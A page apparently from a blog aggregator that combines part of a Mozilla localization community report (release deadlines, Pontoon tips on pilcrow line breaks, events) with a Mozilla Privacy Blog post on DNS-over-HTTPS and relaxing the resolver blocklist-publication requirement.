
What’s new or coming up in mobile

Next l10n deadlines for mobile projects:

  • Firefox for Android v91: July 12
  • Firefox for iOS v34.1: June 9

Once more, we want to thank all the localizers who worked hard for the MR1 (Proton) mobile release. We really appreciate the time and effort spent on helping ensure all these products are available globally (and of course, also on desktop). THANK YOU!

What’s new or coming up in web projects

AMO

There are a few strings exposed to Pontoon that do not require translation. Only Mozilla staff in the admin role to the product would be able to see them. The developer for the feature will add a comment of “no need to translate” or context to the string at a later time. We don’t know when this will be added. For the time being, please ignore them. Most of the strings with a source string ID of src/olympia/scanners/templates/admin/* can be ignored. However, there are still a handful of strings that fall out of the category.

MDN

The project continues to be on hold in Pontoon. The product repository doesn’t pick up any changes made in Pontoon, so fr, ja, zh-CN, and zh-TW are now read-only for now.  The MDN site, however, is still maintaining the articles localized in these languages plus ko, pt-BR, and ru.

Mozilla.org

The websites in ar, hi-IN, id, ja, and ms languages are now fully localized through vendor service since our last report. Communities of these languages are encouraged to help promote the sites through various social media platforms to  increase download, conversion and create new profiles.

What’s new or coming up in SuMo

Lots of exciting things happening in SUMO in Q2. Here’s a recap of what’s happening:

  • You can now subscribe to Firefox Daily Digest to get updates about what people are saying about Firefox and other Mozilla products on social media like Reddit and Twitter.
  • We now have release notes for Kitsune in Discourse. The latest one was about advanced search syntax which is a replacement for the former Advanced Search feature.
  • We are trying something new for Firefox 89 by collecting MR1 (Major Release 1) specific feedback from across channels (support forum, Twitter, and Reddit). You can look into how we’re doing it on the contributor thread and learn more about MR1 changes from a list that we put together on this spreadsheet.

As always, feel free to join SUMO Matrix room to discuss or just say hi to the rest of the community.

What’s new or coming up in Pontoon

Since May, we’ve been running experiments in Pontoon to increase the number of users reading notifications. For example, as part of this campaign, you might have seen a banner encouraging you to install the Pontoon Add-on — which you really should do — or noticed a slightly different notification icon in the top right corner of the window.

Pontoon NotificationRecently, we also sent an email to all Pontoon accounts active in the past 2 years, with a link to a survey specifically about further improving notifications. If you haven’t completed the survey yet, or haven’t received the email, you can still take the survey here (until June 20th).

Look out for pilcrows

When a source string includes line breaks, Pontoon will show a pilcrow character (¶) where the line break happens.

This is how the Fluent file looks like:

onboarding-multistage-theme-tooltip-automatic-2 =
    .title =
        Inherit the appearance of your operating
        system for buttons, menus, and windows.

While in most cases the line break is not relevant — it’s just used to make the source file more readable — double check the resource comment: if the line break is relevant, it will be pointed out explicitly.

If they’re not relevant, you can just put your translation on one line.

If you want to preserve the line breaks in your translation, you have a few options:

  • Use SHIFT+ENTER to create a new line while translating.
  • Click the ¶ character in the source: that will create a new line in the position where your cursor currently sits.
  • Use the COPY button to copy the source, then edit it. That’s not really efficient, as your locale might need a line break in a different place.

Do not select the text with your mouse, and copy it in the translation field. That will copy the literal character in the translation, and it will be displayed in the final product, causing bugs.

If you see the ¶ character in the translation field (see red arrow in the image below), it will also appear in the product you are translating, which is most likely not what you want. On the other hand, it’s expected to see the ¶ character in the list of translations under the translation field (green arrow), as it is in the source string and the string list.

Events

  • We have held our first Localization Workshop Zoom event on Saturday June 5th. Next iterations will happen on Friday June 11th and Saturday June 12th. We have invited active managers and translators from a subset of locales. If this experience turns out to be useful, we will consider opening up to an even larger audience with expanded locales.
  • Want to showcase an event coming up that your community is participating in? Reach out to any l10n-driver and we’ll include that (see links to emails at the bottom of this report)

Friends of the Lion

Know someone in your l10n community who’s been doing a great job and should appear here? Contact one of the l10n-drivers and we’ll make sure they get a shout-out (see list at the bottom)!

Useful Links

Questions? Want to get involved?

  • If you want to get involved, or have any question about l10n, reach out to:

Did you enjoy reading this report? Let us know how we can improve by reaching out to any one of the l10n-drivers listed above.

Mozilla Privacy BlogWorking in the open: Enhancing privacy and security in the DNS

In 2018, we started pioneering work on securing one of the oldest parts of the Internet, one that had till then remained largely untouched by efforts to make the web safer and more private: the Domain Name System (DNS). We passed a key milestone in that endeavor last year, when we rolled out DNS-over-HTTPS (DoH) technology by default in the United States, thus improving privacy and security for millions of people. Given the transformative nature of this technology and in line with our mission commitment to transparency and collaboration, we have consistently sought to implement DoH thoughtfully and inclusively. Today we’re sharing our latest update on that continued effort.

Between November 2020 and January 2021 we ran a public comment period, to give the broader community who care about the DNS – including human rights defenders; technologists; and DNS service providers – the opportunity to provide recommendations for our future DoH work. Specifically, we canvassed input on our Trusted Recursive Resolver (TRR) policies, the set of privacy, security, and integrity commitments that DNS recursive resolvers must adhere to in order to be considered as default partner resolvers for Mozilla’s DoH roll-out.

We received rich feedback from stakeholders across the world, and we continue to reflect on how it can inform our future DoH work and our TRR policies. As we continue that reflection, we’re today publishing the input we received during the comment period – acting on a commitment to transparency that we made at the outset of the process. You can read the comments here.

During the comment period and prior, we received substantial input on the blocklist publication requirement of our TRR policies. This requirement means that resolvers in our TRR programme  must publicly release the list of domains that they block access to. This blocking could be the result of either legal requirements that the resolver is subject to, or because a user has explicitly consented to certain forms of DNS blocking. We are aware of the downsides associated with blocklist publication in certain contexts, and one of the primary reasons for undertaking our  comment period was to solicit constructive feedback and suggestions on how to best ensure meaningful transparency when DNS blocking takes place. Therefore, while we reflect on the input regarding our TRR policies and solutions for blocking transparency, we will relax this blocklist publication requirement. As such, current or prospective TRR partners will not be required to mandatorily publish DNS blocklists from here on out.

DoH is a transformative technology. It is relatively new and, as such, is of interest to a variety of stakeholders around the world. As we bring the privacy and security benefits of DoH to more Firefox users, we will continue our proactive engagement with internet service providers, civil society organisations, and everyone who cares about privacy and security in the internet ecosystem.

We look forward to this collaborative work. Stay tuned for more updates in the coming months.

The post Working in the open: Enhancing privacy and security in the DNS appeared first on Open Policy & Advocacy.